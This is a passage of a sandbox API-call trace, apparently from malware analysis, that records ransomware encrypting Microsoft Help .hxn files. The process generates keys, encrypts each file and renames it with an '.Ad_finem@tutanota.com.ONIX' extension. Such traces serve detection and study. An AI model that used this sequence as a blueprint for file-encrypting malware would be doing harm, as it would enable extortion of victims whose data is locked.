(lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.069] GetProcessHeap () returned 0x410000 [0122.069] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.069] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa755d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa755d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.DEV.14.1033.hxn", cAlternateFileName="MSEXCE~2.HXN")) returned 1 [0122.069] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.069] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.069] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15e, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.069] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.070] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.070] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.070] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.070] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.070] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 59 [0122.070] GetProcessHeap () returned 0x410000 [0122.070] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0122.070] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" [0122.070] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.070] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=350) returned 1 [0122.070] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x15e [0122.070] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.070] GetProcessHeap () returned 0x410000 [0122.070] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.070] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.070] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.074] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.077] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.078] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15e) returned 0x44faf8 [0122.078] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15e) returned 0x442938 [0122.078] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.078] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x15e, lpOverlapped=0x0) returned 1 [0122.078] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.078] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x15e, lpOverlapped=0x0) returned 1 [0122.079] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.079] CloseHandle (hObject=0x4d0) returned 1 [0122.080] GetProcessHeap () returned 0x410000 [0122.080] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.080] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.081] GetProcessHeap () returned 0x410000 [0122.081] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.081] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GRAPH.14.1033.hxn", cAlternateFileName="MSGRAP~1.HXN")) returned 1 [0122.082] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.082] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.082] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x146, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.083] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.083] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.083] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.083] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.083] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.083] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 55 [0122.083] GetProcessHeap () returned 0x410000 [0122.083] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x44faf8 [0122.083] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" [0122.083] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.083] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=326) returned 1 [0122.083] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x146 [0122.083] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.083] GetProcessHeap () returned 0x410000 [0122.083] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.083] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.083] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.086] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.088] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.089] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x146) returned 0x442938 [0122.089] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x146) returned 0x46a0f0 [0122.089] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.089] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x146, lpOverlapped=0x0) returned 1 [0122.089] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.089] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x146, lpOverlapped=0x0) returned 1 [0122.090] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x146, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.090] CloseHandle (hObject=0x4d0) returned 1 [0122.091] GetProcessHeap () returned 0x410000 [0122.091] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.091] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.102] GetProcessHeap () returned 0x410000 [0122.102] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.102] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfd789af0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd789af0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd822070, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GROOVE.14.1033.hxn", cAlternateFileName="MSGROO~1.HXN")) returned 1 [0122.102] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.102] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.102] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x14c, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.102] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.102] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.102] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.103] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.103] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.103] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 56 [0122.103] GetProcessHeap () returned 0x410000 [0122.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe0) returned 0x44faf8 [0122.103] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" [0122.103] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.103] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=332) returned 1 [0122.103] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x14c [0122.103] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.103] GetProcessHeap () returned 0x410000 [0122.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.103] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.103] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.107] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.108] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.109] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14c) returned 0x442938 [0122.109] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14c) returned 0x46a0f0 [0122.109] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.109] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x14c, lpOverlapped=0x0) returned 1 [0122.109] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-332, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.109] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x14c, lpOverlapped=0x0) returned 1 [0122.110] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x14c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.110] CloseHandle (hObject=0x4d0) returned 1 [0122.111] GetProcessHeap () returned 0x410000 [0122.111] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.111] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.113] GetProcessHeap () returned 0x410000 [0122.113] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.113] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11446a50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATH.14.1033.hxn", cAlternateFileName="MSINFO~1.HXN")) returned 1 [0122.113] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.114] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.114] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x158, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.114] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.114] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.115] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.115] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.115] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.115] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 58 [0122.115] GetProcessHeap () returned 0x410000 [0122.115] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0122.115] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" [0122.115] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.115] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=344) returned 1 [0122.115] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x158 [0122.115] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.115] GetProcessHeap () returned 0x410000 [0122.115] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.115] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.115] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.120] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.134] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.135] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x158) returned 0x44faf8 [0122.135] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x158) returned 0x442938 [0122.135] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.135] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x158, lpOverlapped=0x0) returned 1 [0122.135] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.135] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x158, lpOverlapped=0x0) returned 1 [0122.136] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x158, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.136] 